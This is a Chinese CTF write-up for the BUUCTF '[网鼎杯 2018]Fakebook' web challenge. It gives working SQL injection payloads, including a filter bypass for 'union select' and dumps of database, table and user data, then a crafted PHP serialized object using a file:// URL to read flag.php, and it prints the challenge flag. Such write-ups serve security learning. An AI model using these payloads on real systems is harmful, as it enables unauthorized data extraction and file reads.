提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
题目
BUUCTF的[网鼎杯 2018]Fakebook 1
一、做题步骤
1.收集信息
1.创建用户
2.登录
3.点击用户名,进入新页面
观察网址,这是一道注入的题目
2.测试
1.测试注入列数
说明注入列数为4
2.测试注入点
union select 被过滤
替代
union/**/select
union all select
?no=0 union all select 1,2,3, 4 %23
2是注入点
3.注入
1.爆数据库
?no=0 union all select 1,group_concat(schema_name),3, 4 from
information_schema.schemata %23
2.爆表名
?no=0 union all select 1,group_concat(table_name),3, 4 from
information_schema.tables where table_schema=‘fakebook’ #
3.爆字段
?no=0 union all select 1,group_concat(column_name),3, 4 from
information_schema.columns where table_name=‘users’ #
4.爆数据
?no=0 union all select 1,group_concat(data),3, 4 from fakebook.users #
5.看到很多地方都提到了 /var/www/html/view.php
6.构造序列化结果
data中的数据
O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:13:"www.baidu.com";}
进行修改
O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
因为修改的部分是blog,因此将序列化结果放置在注入点4中
?no=0 union all select 1,group_concat(data),3, 'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' from fakebook.users #
4.获取flag
1.查看最终页面的源代码,发现有base64密文
2.解密该密文,或者直接点击该链接
获取flag{40e95ede-4d22-46b4-b71c-3f407d674ab5}